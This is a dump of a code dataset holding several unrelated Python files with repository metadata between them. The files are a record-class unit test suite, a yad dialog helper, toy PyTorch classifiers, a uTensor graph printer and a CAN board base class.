    """Fixture: hash-index key mixes the 'test' slot with record keys."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    hash_index_fields = ('test', 'a', 'b')
class RecordTests(unittest.TestCase):
    """Test base record class: immutability, dict-like behaviour, field
    validation, copying, JSON serialization and hash-index keys."""
    def setUp(self):
        """Create a record with two data keys shared by most tests."""
        self.rdict = {'color': 'red', 'number': 10}
        self.record = TstRecord('service', 'test', **self.rdict)
    def test_record_access(self):
        """Slot attributes and record data are accessed through different channels."""
        # test attributes and record data set
        self.assertEqual(self.record.test, 'test')
        self.assertEqual(self.record['color'], 'red')
        # test difference between attributes and record data
        with self.assertRaises(KeyError) as conm:
            # pylint:disable=pointless-statement
            self.record['test']
        self.assertEqual(str(conm.exception), "'test'")
        with self.assertRaises(AttributeError) as conm:
            # pylint:disable=pointless-statement,no-member
            self.record.color
        self.assertEqual(
            str(conm.exception), "'TstRecord' object has no attribute 'color'"
        )
    def test_is_immutable(self):
        """Assignment and deletion of attributes/items both raise TypeError."""
        with self.assertRaises(TypeError) as conm:
            self.record.test = 1
        self.assertEqual(
            str(conm.exception),
            "'TstRecord' object does not support attribute assignment"
        )
        with self.assertRaises(TypeError) as conm:
            self.record['number'] = 1
        self.assertEqual(
            str(conm.exception),
            "'TstRecord' object does not support item assignment"
        )
        with self.assertRaises(TypeError) as conm:
            del self.record.test
        self.assertEqual(
            str(conm.exception),
            "'TstRecord' object does not support attribute deletion"
        )
        with self.assertRaises(TypeError) as conm:
            del self.record['number']
        self.assertEqual(
            str(conm.exception),
            "'TstRecord' object does not support item deletion"
        )
    def test_repr(self):
        """Placeholder: repr check disabled due to dict ordering flakiness."""
        # TODO: the dict portion makes this test intermittently problematic
        # self.assertEqual(
        #     repr(self.record), "<TstRecord, {'color': 'red', 'number': 10}>"
        # )
        pass
    def test_dict_like(self):
        """Records support the read-only mapping protocol and hash like frozendict."""
        self.assertIn('color', self.record)
        self.assertNotIn('test', self.record)
        self.assertEqual(self.record, {'color': 'red', 'number': 10})
        self.assertNotEqual(self.record, {'color': 'red', 'number': 1})
        self.assertEqual(len(self.record), 2)
        # hash is hash of record
        fdt = frozendict({'color': 'red', 'number': 10})
        self.assertEqual(hash(self.record), hash(fdt))
        self.assertEqual(self.record.get('color', 'blue'), 'red')
        self.assertNotEqual(self.record.get('color', 'blue'), 'blue')
        self.assertEqual(self.record.get('other', 'blue'), 'blue')
        six.assertCountEqual(
            self,
            list(self.record.items()), [('color', 'red'), ('number', 10)]
        )
        self.assertDictEqual(
            {'color': 'red', 'number': 10},
            {key: val for key, val in self.record.items()}
        )
        six.assertCountEqual(
            self,
            ['color', 'number'], list(self.record.keys())
        )
        six.assertCountEqual(
            self,
            ['color', 'number'], [key for key in self.record.keys()]
        )
        six.assertCountEqual(
            self,
            ['red', 10], list(self.record.values())
        )
        six.assertCountEqual(
            self,
            ['red', 10], [value for value in self.record.values()]
        )
    def test_non_null_fields(self):
        """non_null_fields must be present and not None; extras are allowed."""
        # raises error if attribute not set
        with self.assertRaises(KeyError) as conm:
            RequiredFieldRecord('red', 1, a=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following field is required: b'"
        )
        with self.assertRaises(KeyError) as conm:
            RequiredFieldRecord('red', 1, d=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following fields are required: a, b'"
        )
        # raises error if required field is None
        with self.assertRaises(KeyError) as conm:
            RequiredFieldRecord('red', 1, a=2, b=None)
        self.assertEqual(
            str(conm.exception),
            "'The following field can not be None: b'"
        )
        with self.assertRaises(KeyError) as conm:
            RequiredFieldRecord('red', 1, a=None, b=None)
        self.assertEqual(
            str(conm.exception),
            "'The following fields can not be None: a, b'"
        )
        # ok to set extra fields if fields not defined
        rec = RequiredFieldRecord('red', 1, a=1, b=2, c=3)
        # if we are here no error raised
        assert rec
    def test_fields(self):
        """A declared field list rejects extras and preserves key ordering."""
        # test rejects extra fields
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, b=3, c=4, d=5)
        self.assertEqual(
            str(conm.exception),
            "'Extra keys: d. "
            "Only the following keys can be used in the record: a, b, c'"
        )
        # test ok
        rec = FieldRecord('red', 1, a=2, b=3, c=4)
        assert rec
        # test ok for non-required fields to be None
        rec = FieldRecord('red', 1, a=2, b=3, c=None)
        assert rec
        # test required fields
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following field is required: b'"
        )
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, d=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following fields are required: a, b'"
        )
        # raises error if required field is None
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, b=None, c=None)
        self.assertEqual(
            str(conm.exception),
            "'The following field can not be None: b'"
        )
        # test ordering
        rec = FieldRecord('red', 1, a=2, c=4, b=3)
        expected = ['a', 'b', 'c']
        result = [key for key in rec.keys()]
        self.assertEqual(expected, result)
    def test_require_all_fields(self):
        """require_all_fields=True demands every declared key be supplied."""
        # test requires all fields
        with self.assertRaises(KeyError) as conm:
            RequireAllFieldsRecord('red', 1, a=2, b=3)
        self.assertEqual(
            str(conm.exception),
            "'Missing keys: c. "
            "The following keys must be used in the record: a, b, c'"
        )
        # test rejects extra fields
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, b=3, c=4, d=5)
        self.assertEqual(
            str(conm.exception),
            "'Extra keys: d. "
            "Only the following keys can be used in the record: a, b, c'"
        )
        # test ok
        rec = FieldRecord('red', 1, a=2, b=3, c=4)
        assert rec
        # test ok for non-required fields to be None
        rec = FieldRecord('red', 1, a=2, b=3, c=None)
        assert rec
        # test required fields
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following field is required: b'"
        )
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, d=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following fields are required: a, b'"
        )
        # raises error if required field is None
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, b=None, c=None)
        self.assertEqual(
            str(conm.exception),
            "'The following field can not be None: b'"
        )
        # test ordering
        rec = FieldRecord('red', 1, a=2, c=4, b=3)
        expected = ['a', 'b', 'c']
        result = [key for key in rec.keys()]
        self.assertEqual(expected, result)
    def test_copy_record(self):
        """Test copy_record method"""
        copy = self.record.copy_record()
        self.assertEqual(copy, self.rdict)
        copy = self.record.copy_record(color='green')
        self.assertEqual(copy, {'color': 'green', 'number': 10})
        # ensure extra/incorrect fields can't be set
        record = FieldRecord('red', 1, a=2, b=3, c=4)
        self.assertRaises(
            KeyError, record.copy_record, colorx='green'
        )
        # ensure non-null fields can't be set to None
        self.assertRaises(
            KeyError, record.copy_record, a=None
        )
    def test_json(self):
        """Test json() method"""
        dtime = datetime.datetime(2001, 1, 1, 1, 1, 1, 100)
        date = datetime.date(2001, 1, 1)
        json_record = TstRecord(
            service='service', test='test',
            string='test', integer=1,
            datetime=dtime, date=date,
            lst=[dtime, date],
            tpl=(dtime, date),
            dictionary=dict(datetime=dtime, date=date)
        )
        dtime_str = '2001-01-01T01:01:01'
        date_str = '2001-01-01'
        result = json_record.json()
        self.assertIsInstance(result, str)
        result = json.loads(result)
        # slot attributes (service/test) must not leak into the JSON payload
        self.assertNotIn('service', result)
        self.assertNotIn('test', result)
        self.assertEqual(result['string'], 'test')
        self.assertIsInstance(result['integer'], int)
        self.assertEqual(result['integer'], 1)
        self.assertEqual(result['datetime'], dtime_str)
        self.assertEqual(result['date'], date_str)
        self.assertEqual(result['lst'], [dtime_str, date_str])
        self.assertEqual(result['tpl'], [dtime_str, date_str])
        result = result['dictionary']
        self.assertIsInstance(result, dict)
        self.assertEqual(result['datetime'], dtime_str)
        self.assertEqual(result['date'], date_str)
        # nested records serialize recursively
        json_record2 = TstRecord(
            service='service', test='test',
            record=json_record
        )
        result = json_record2.json()
        self.assertIsInstance(result, str)
        result = json.loads(result)
        self.assertNotIn('service', result)
        self.assertNotIn('test', result)
        result = result['record']
        self.assertIsInstance(result, dict)
        self.assertNotIn('service', result)
        self.assertNotIn('test', result)
        self.assertEqual(result['string'], 'test')
        self.assertIsInstance(result['integer'], int)
        self.assertEqual(result['integer'], 1)
        self.assertEqual(result['datetime'], dtime_str)
        self.assertEqual(result['date'], date_str)
        self.assertEqual(result['lst'], [dtime_str, date_str])
        self.assertEqual(result['tpl'], [dtime_str, date_str])
        result = result['dictionary']
        self.assertIsInstance(result, dict)
        self.assertEqual(result['datetime'], dtime_str)
        self.assertEqual(result['date'], date_str)
    def test_empty_slot(self):
        """Test empty_slot"""
        service = getattr(TstRecord, 'service')
        self.assertTrue(isinstance(service, empty_slot))
    @mock.patch('dubplate.generate_hash_index_key')
    def test_get_hash_index_key(self, mock_hash_index_key):
        """Test get_hash_index_key"""
        mock_hash_index_key.return_value = ''
        # no fields/hash_index_fields declared -> empty field list
        rec = TstRecord('service', 'test', a=1, b=2)
        rec.get_hash_index_key()
        mock_hash_index_key.assert_called_with(
            rec.__class__.__name__, [], rec
        )
        # falls back to the declared `fields` tuple
        fields_rec = FieldRecord('service', 'test', a=1, b=2)
        fields_rec.get_hash_index_key()
        mock_hash_index_key.assert_called_with(
            fields_rec.__class__.__name__, fields_rec.fields, fields_rec
        )
        # explicit hash_index_fields takes precedence
        hash_rec = HashIndexRecord('service', 'test', a=1, b=2)
        hash_rec.get_hash_index_key()
        mock_hash_index_key.assert_called_with(
            hash_rec.__class__.__name__, hash_rec.hash_index_fields, hash_rec
        )
        # slot names in hash_index_fields get merged with record data
        slot_rec = HashIndexSlotsRecord('service', 'test', a=1, b=2)
        slot_rec.get_hash_index_key()
        expected_val_dict = frozendict({'test': 'test', 'a': 1, 'b': 2})
        mock_hash_index_key.assert_called_with(
            slot_rec.__class__.__name__, slot_rec.hash_index_fields,
            expected_val_dict
        )
| 31.551802 | 78 | 0.585766 | 1,665 | 14,009 | 4.821622 | 0.135135 | 0.087818 | 0.047334 | 0.052068 | 0.655207 | 0.595416 | 0.53986 | 0.522671 | 0.500747 | 0.477578 | 0 | 0.015841 | 0.288029 | 14,009 | 443 | 79 | 31.623025 | 0.789052 | 0.115497 | 0 | 0.481967 | 0 | 0 | 0.124848 | 0.002598 | 0 | 0 | 0 | 0.002257 | 0.327869 | 1 | 0.042623 | false | 0.003279 | 0.029508 | 0 | 0.12459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90b2d6635c836ba8cc887d96866eaefa439a024 | 1,582 | py | Python | gui.py | quintenroets/gui | d53461771f847805be533d96dcceb4f10f9ec9d7 | [
"MIT"
] | null | null | null | gui.py | quintenroets/gui | d53461771f847805be533d96dcceb4f10f9ec9d7 | [
"MIT"
] | null | null | null | gui.py | quintenroets/gui | d53461771f847805be533d96dcceb4f10f9ec9d7 | [
"MIT"
] | null | null | null | import subprocess
import cli
def ask(message, choices=None, options=None):
    """Prompt the user via a yad dialog.

    Args:
        message: text shown to the user (wrapped in <big> markup).
        choices: None for free-form text entry, a list of choice labels,
            or a dict mapping displayed labels to return values.
        options: extra yad options merged over the defaults.

    Returns:
        The stripped entry text, the selected choice (or its mapped value
        for a dict), or a falsy value when the dialog is cancelled.

    Raises:
        TypeError: if choices is neither None, a list, nor a dict.
    """
    options = {"text": f"<big>{message}</big>"} | (options or {})
    if choices is None:
        res = run("entry", options=options)
        res = res and res.strip()
    elif isinstance(choices, list):
        res = ask_choices(choices, options=options)
    elif isinstance(choices, dict):
        res = ask_choices(list(choices.keys()), options=options)
        # map the displayed label back to its associated value
        res = res and choices[res]
    else:
        # Fix: was a bare `Exception`; TypeError is the precise category and
        # remains backward compatible with callers catching Exception.
        raise TypeError("Choices parameter not valid")
    return res
def ask_choices(choices, options=None):
    """Show a yad list dialog and return the full choice the user picked."""
    # Displayed labels are capped at 100 chars to avoid yad errors; map each
    # label back to the original (possibly longer) choice string.
    truncated = {choice[:100]: choice for choice in choices}
    sep = "###"
    options = {"separator": sep, "no-headers": None} | (options or {})
    args = ["--column=text", "--column=@font@"]
    for label in truncated:
        args.extend((label, "Monospace 15"))
    selection = run("list", args=args, options=options)
    if selection:
        selection = selection.split(sep)[0]
    if selection:
        selection = truncated[selection]
    return selection
def run(subcommand, args=None, options=None):
    """Invoke ``yad --<subcommand>`` with default window options merged
    under the caller-supplied ones, returning whatever cli.get yields."""
    args = args or []
    options = {
        "geometry": "907x514+500+200",
        "title": "",
        "text-align": "center",
        "icon-theme": "Win11",
        "fontname": "Noto Sans 40",
    } | (options or {})
    # NOTE(review): cli.get presumably expands the options dict into
    # --key=value flags and returns captured output; check=False suggests a
    # non-zero exit (dialog cancel) is not treated as an error -- confirm in
    # the cli module.
    result = cli.get("yad", f"--{subcommand}", *args, options, check=False)
    return result
def ask_yn(question):
    """Ask a yes/no question with kdialog; True iff the user chose yes."""
    completed = subprocess.run(["kdialog", "--yesno", question], capture_output=True)
    # kdialog exits 0 for "yes"
    return completed.returncode == 0
| 29.296296 | 79 | 0.606195 | 197 | 1,582 | 4.827411 | 0.431472 | 0.046267 | 0.037855 | 0.063091 | 0.078864 | 0.054679 | 0 | 0 | 0 | 0 | 0 | 0.019199 | 0.242731 | 1,582 | 53 | 80 | 29.849057 | 0.774624 | 0.032238 | 0 | 0.047619 | 0 | 0 | 0.151733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90d9c04b806e6d86ef86148bed6c3ca773c27ce | 7,425 | py | Python | Models.py | PatrickgHayes/gmm-dnn-for-interpretability | 83f88a5df726fbf4eacc68a679232e24c0d7b0f3 | [
"MIT"
] | null | null | null | Models.py | PatrickgHayes/gmm-dnn-for-interpretability | 83f88a5df726fbf4eacc68a679232e24c0d7b0f3 | [
"MIT"
] | null | null | null | Models.py | PatrickgHayes/gmm-dnn-for-interpretability | 83f88a5df726fbf4eacc68a679232e24c0d7b0f3 | [
"MIT"
] | null | null | null | # DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
#
# This material is based upon work supported by the Assistant Secretary of Defense for Research and
# Engineering under Air Force Contract No. FA8721-05-C-0002 and/or FA8702-15-D-0001. Any opinions,
# findings, conclusions or recommendations expressed in this material are those of the author(s) and
# do not necessarily reflect the views of the Assistant Secretary of Defense for Research and
# Engineering.
#
# © 2018 Massachusetts Institute of Technology.
#
# MIT Proprietary, Subject to FAR52.227-11 Patent Rights - Ownership by the contractor (May 2014)
#
# The software/firmware is provided to you on an As-Is basis
#
# Delivered to the U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013 or
# 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government rights in this work are
# defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed above. Use of this work other than
# as specifically authorized by the U.S. Government may violate any copyrights that exist in this
# work.
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import numpy as np
import torch
from matplotlib import pyplot as plt
import matplotlib.cm as cm
from collections import defaultdict
from collections import OrderedDict
class NumberNet(nn.Module):
    """Single-linear-layer classifier mapping a scalar float to 5 class logits.

    Deliberately tiny so the entire network can be visualized and its
    behaviour understood.
    """

    def __init__(self):
        super(NumberNet, self).__init__()
        self.layer = nn.Linear(1, 5)

    def forward(self, x):
        """Return (N, 5) logits for an (N, 1) input."""
        logits = self.layer(x)
        return logits.view(-1, 5)
class DeepNumberNet(nn.Module):
    """NumberNet with a stack of hidden LeakyReLU-activated layers.

    Bug fixed: the original OrderedDict repeated the keys 'layer2',
    'layer3', 'layer5' and 'activation2'/'activation5'.  Duplicate keys
    overwrite earlier entries during dict construction, so most of the
    intended hidden layers were silently dropped from the Sequential.
    The names are now unique, preserving the architecture as written:
    1 -> 20, seven hidden 20 -> 20 layers, then 20 -> 5.
    """

    def __init__(self):
        super(DeepNumberNet, self).__init__()
        self.model = nn.Sequential(OrderedDict([
            ('layer1', nn.Linear(1, 20)),
            ('activation1', nn.LeakyReLU()),
            ('layer2', nn.Linear(20, 20)),
            ('activation2', nn.LeakyReLU()),
            ('layer3', nn.Linear(20, 20)),
            ('activation3', nn.LeakyReLU()),
            ('layer4', nn.Linear(20, 20)),
            ('activation4', nn.LeakyReLU()),
            ('layer5', nn.Linear(20, 20)),
            ('activation5', nn.LeakyReLU()),
            ('layer6', nn.Linear(20, 20)),
            ('activation6', nn.LeakyReLU()),
            ('layer7', nn.Linear(20, 20)),
            ('activation7', nn.LeakyReLU()),
            ('layer8', nn.Linear(20, 20)),
            ('activation8', nn.LeakyReLU()),
            ('layer9', nn.Linear(20, 5)),
            ('activation9', nn.LeakyReLU()),
        ]))

    def forward(self, x):
        """Return (N, 5) logits for an (N, 1) input."""
        output = self.model(x)
        return output.view(-1, 5)
def dsig(x):
    """Scaled derivative of the sigmoid:

        4 e^x
        -----------
        (e^x + 1)^2

    peaking at 1 for x = 0 and decaying to 0 in both directions.

    Fix: computed via the algebraically identical
    4 * sigmoid(x) * (1 - sigmoid(x)).  The original exp-based form
    overflows to inf for large x (x > ~88 in float32), yielding inf/inf
    = NaN; torch.sigmoid saturates gracefully instead.
    """
    s = torch.sigmoid(x)
    return 4 * s * (1 - s)
class DSigNet(nn.Module):
    """A simple network to test the dsig activation.

    Intuition behind dsig: monotonic activations carve the input space into
    half spaces, which extend infinitely, so networks built from them assign
    high-probability estimates to out-of-domain inputs.  dsig instead
    produces a bounded "bump", so the network becomes a collection of
    completely bounded regions.  Approximating the same function may take
    many more nodes (each section of the input needs its own node rather
    than sharing one half space), but the bounded regions better respect
    the finite training domain.
    """

    def __init__(self):
        super(DSigNet, self).__init__()
        self.layer = nn.Linear(1, 5)

    def forward(self, x):
        """Return (N, 5) dsig-activated outputs for an (N, 1) input."""
        activated = dsig(self.layer(x))
        return activated.view(-1, 5)
def plot_decision_boundary(number_net, numbers, span=(-10, 1)):
    """Plot per-class softmax curves of *number_net* over *span* plus the
    training points of *numbers* (expects .data and .labels) along y=0."""
    lower, upper = span
    plt.ylim(-0.2, 1.2)
    plt.xlim(lower, upper)
    plt.xticks([i for i in range(lower, upper+1) if i % 5 == 0])
    # 10 sample points per unit of the input range
    domain = np.linspace(lower, upper, (upper - lower) * 10)
    domain = torch.tensor(domain).float().view(-1, 1)
    outputs = number_net(domain)
    softmax = F.softmax(outputs, 1)
    # NOTE(review): max_values is unused; output_labels feeds domain_dict,
    # whose plotting below is commented out.
    max_values, output_labels = outputs.max(1)
    softmax = softmax.detach().numpy()
    # softmax = outputs.detach().numpy()
    train_data, train_labels = numbers.data, numbers.labels
    # group training samples by their label for per-class scatter colors
    train_dict = defaultdict(list)
    for train, la in zip(train_data, train_labels):
        train_dict[la].append(train)
    labels = [0, 1, 2, 3, 4]
    domain_dict = defaultdict(list)
    color_dict = dict()
    # one rainbow color per class
    colors = iter(cm.rainbow(np.linspace(0, 1, len(labels))))
    for label in labels:
        color_dict[label] = next(colors)
    domain = domain.numpy()
    output_labels = output_labels.numpy()
    for do, la in zip(domain, output_labels):
        domain_dict[la].append(do)
    # for key in domain_dict:
    #     plt.scatter(domain_dict[key], [key] * len(domain_dict[key]), color=color_dict[key])
    for label in labels:
        plt.plot(domain, softmax[:, label], color=color_dict[label])
    for label in labels:
        plt.scatter(train_dict[label], [0] * len(train_dict[label]), color=color_dict[label])
    plt.show()
def plot_loss(loss_history):
    """Plot the training loss against epoch index and display the figure."""
    epochs = np.arange(len(loss_history))
    plt.plot(epochs, loss_history)
    plt.show()
if __name__ == "__main__":
    # Training loop for DSigNet on the Numbers dataset.
    # NOTE(review): `Numbers` is neither defined nor imported anywhere in
    # this file, so this block raises NameError as written -- confirm the
    # missing import/definition.
    # number_net = NumberNet()
    #deep_number_net = DeepNumberNet()
    dsig_net = DSigNet()
    criterion = nn.CrossEntropyLoss()
    optimizer = optim.SGD(dsig_net.parameters(), lr=0.01, momentum=0.9)
    # deep_optimizer = optim.SGD(number_net.parameter(), lr=0.01, momentum=0.9)
    dataloader = DataLoader(Numbers(), shuffle=True, batch_size=5)
    loss_history = list()
    for epoch in range(100000):
        running_loss = 0.0
        for i, (data, labels) in enumerate(dataloader):
            # Variable is a no-op wrapper in modern PyTorch
            data, labels = Variable(data.float().view(-1, 1)), Variable(labels.long())
            optimizer.zero_grad()
            # deep_optimizer.zero_grad()
            outputs = dsig_net(data)
            loss = criterion(outputs, labels)
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
        loss_history.append(running_loss)
        print("Loss: " + str(running_loss))
        print()
        # for name, param in number_net.named_parameters():
        #     if param.requires_grad:
        #         print(name, param.data)
        #         print()
        #         print()
        # Plot loss graph and decision boundaries
        if epoch % 10000 == 0:
            if epoch % 50000 == 0:
                plot_loss(loss_history)
            # NOTE(review): plot_decision_boundary requires a `numbers`
            # argument; this call is missing it and would raise TypeError.
            plot_decision_boundary(dsig_net)
            input("To continue press enter")
| 34.534884 | 100 | 0.654545 | 1,009 | 7,425 | 4.723489 | 0.345887 | 0.018464 | 0.016786 | 0.017625 | 0.142887 | 0.113093 | 0.088754 | 0.074486 | 0.074486 | 0.051406 | 0 | 0.035373 | 0.238519 | 7,425 | 214 | 101 | 34.696262 | 0.807393 | 0.383838 | 0 | 0.198198 | 0 | 0 | 0.043528 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0 | 0.099099 | 0.018018 | 0.243243 | 0.018018 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90e7322e3f76de768fce6699f8d10d828183ad2 | 2,018 | py | Python | utensor_cgen/api/utils.py | uTensor/utensor_cgen | eccd6859028d0b6a350dced25ea72ff02faaf9ad | [
"Apache-2.0"
] | 49 | 2018-01-06T12:57:56.000Z | 2021-09-03T09:48:32.000Z | utensor_cgen/api/utils.py | uTensor/utensor_cgen | eccd6859028d0b6a350dced25ea72ff02faaf9ad | [
"Apache-2.0"
] | 101 | 2018-01-16T19:24:21.000Z | 2021-11-10T19:39:33.000Z | utensor_cgen/api/utils.py | uTensor/utensor_cgen | eccd6859028d0b6a350dced25ea72ff02faaf9ad | [
"Apache-2.0"
] | 32 | 2018-02-15T19:39:50.000Z | 2020-11-26T22:32:05.000Z | import textwrap
import click
def show_ugraph(ugraph, oneline=False, ignore_unknown_op=False):
    """Pretty-print a uTensor graph to the terminal with click styling.

    Args:
        ugraph: graph exposing ``topo_order`` (op names in topological
            order) and ``ops_info`` (name -> op info with ``op_type``,
            ``input_tensors``, ``output_tensors``).
        oneline: if True, print one compact line per op instead of the
            multi-line paragraph form.
        ignore_unknown_op: if True, suppress the red "Unknown Ops Detected"
            report for op types the legacy OperatorFactory cannot handle.

    Returns:
        0 (shell-style success code).

    Fix: the paragraph template printed "ouptut(s)"; corrected to
    "output(s)".
    """
    from utensor_cgen.backend.utensor.code_generator.legacy._operators import OperatorFactory
    unknown_ops = set()
    if oneline:
        tmpl = click.style("{op_name} ", fg='yellow', bold=True) + \
            "op_type: {op_type}, inputs: {inputs}, outputs: {outputs}"
        for op_name in ugraph.topo_order:
            op_info = ugraph.ops_info[op_name]
            msg = tmpl.format(op_name=op_name, op_type=op_info.op_type,
                              inputs=[tensor.name for tensor in op_info.input_tensors],
                              outputs=[tensor.name for tensor in op_info.output_tensors])
            click.echo(msg)
            if not OperatorFactory.is_supported(op_info.op_type):
                unknown_ops.add(op_info)
    else:
        tmpl = click.style('op_name: {op_name}\n', fg='yellow', bold=True) + \
            '''\
            op_type: {op_type}
            input(s):
            {inputs}
            {input_shapes}
            output(s):
            {outputs}
            {output_shapes}
            '''
        # dedent strips the literal's leading indentation
        tmpl = textwrap.dedent(tmpl)
        paragraphs = []
        for op_name in ugraph.topo_order:
            op_info = ugraph.ops_info[op_name]
            op_str = tmpl.format(
                op_name=op_name,
                op_type=op_info.op_type,
                inputs=op_info.input_tensors,
                outputs=op_info.output_tensors,
                input_shapes=[tensor.shape for tensor in op_info.input_tensors],
                output_shapes=[tensor.shape for tensor in op_info.output_tensors])
            paragraphs.append(op_str)
            if not OperatorFactory.is_supported(op_info.op_type):
                unknown_ops.add(op_info)
        click.echo('\n'.join(paragraphs))
    click.secho(
        'topological ordered ops: {}'.format(ugraph.topo_order),
        fg='white', bold=True,
    )
    if unknown_ops and not ignore_unknown_op:
        click.echo(
            click.style('Unknown Ops Detected', fg='red', bold=True)
        )
        for op_info in unknown_ops:
            click.echo(
                click.style('  {}: {}'.format(op_info.name, op_info.op_type), fg='red')
            )
    return 0
| 33.633333 | 91 | 0.648167 | 280 | 2,018 | 4.417857 | 0.246429 | 0.082458 | 0.038804 | 0.048504 | 0.499596 | 0.44139 | 0.44139 | 0.357316 | 0.257074 | 0.257074 | 0 | 0.000644 | 0.230922 | 2,018 | 59 | 92 | 34.20339 | 0.796392 | 0 | 0 | 0.217391 | 0 | 0 | 0.090032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021739 | false | 0 | 0.065217 | 0 | 0.108696 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90ed500716a103d48309e19afcddb7e4867f4c9 | 1,396 | py | Python | boards/emu/board.py | evezor/Edge_Boards | 7d0e0858c235982e6f62ce97db6a86e1759241a0 | [
"MIT"
] | 2 | 2020-12-03T06:26:48.000Z | 2022-01-30T22:00:22.000Z | boards/emu/board.py | evezor/Edge_Boards | 7d0e0858c235982e6f62ce97db6a86e1759241a0 | [
"MIT"
] | 4 | 2020-08-23T21:21:30.000Z | 2021-04-02T01:05:48.000Z | boards/emu/board.py | evezor/Edge_Boards | 7d0e0858c235982e6f62ce97db6a86e1759241a0 | [
"MIT"
] | 2 | 2020-08-20T16:38:17.000Z | 2020-08-28T02:07:31.000Z | # board.py
# abstract class for zorg and edge
import time
from ocan import *
class Board():
    """Abstract base for Zorg and Edge boards.

    Wires up a CAN interface (``OCan``) and, driven by a manifest dict,
    dynamically imports and instantiates a hardware driver.
    """
    # shared defaults; __init__ replaces ocan with a live instance
    can_id = None
    pause = True
    ocan = None

    def __init__(self, manifest):
        """Build the board from *manifest* (a dict), then boot it."""
        self.manifest = manifest
        # Bug fix: init_board() appends to self.parameters, which was never
        # created anywhere in this class.  Create it here unless a subclass
        # already provided one.
        if not hasattr(self, "parameters"):
            self.parameters = []
        self.ocan = OCan()
        self.init_board()
        self.init_filters()
        self.boot()

    def init_filters(self):
        # accept-everything filter on bank 0
        self.ocan._setfilter(0, (0, 0))

    def init_board(self):
        # setup Edge hardware (driven by manifest and driver)
        if "driver" in self.manifest:
            driver = self.manifest['driver']
            print("init_board driver:", driver)
            module = __import__(driver)
            print("init_board module:", module)
            driver = getattr(module, driver)
            self.driver = driver()
            # manifest parameters create 2 things:
            #   1. list of names in edge.parameters
            #   2. dict in driver.parameters
            # NOTE(review): ``driver`` is still the class here, so this
            # writes to a class-level ``parameters`` dict shared by all
            # driver instances -- confirm that is intended.
            for parameter in self.manifest.get('parameters', []):
                self.parameters.append(parameter['name'])
                driver.parameters[parameter['name']] = parameter
        if "init" in self.manifest:
            init = self.manifest['init']
            print("init_board init:", init)
            init = getattr(self.driver, init)
            init()

    def boot(self):
        # Zorg just goes, Edge waits on Zorg
        pass
| 23.266667 | 64 | 0.553725 | 155 | 1,396 | 4.877419 | 0.335484 | 0.111111 | 0.055556 | 0.05291 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006593 | 0.348138 | 1,396 | 59 | 65 | 23.661017 | 0.824176 | 0.164756 | 0 | 0 | 0 | 0 | 0.077787 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.03125 | 0.09375 | 0 | 0.34375 | 0.09375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d90f3304a9f8b119e26ad00862e02c94d7978328 | 962 | py | Python | bin/rtmg_complete.py | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
] | null | null | null | bin/rtmg_complete.py | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
] | null | null | null | bin/rtmg_complete.py | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
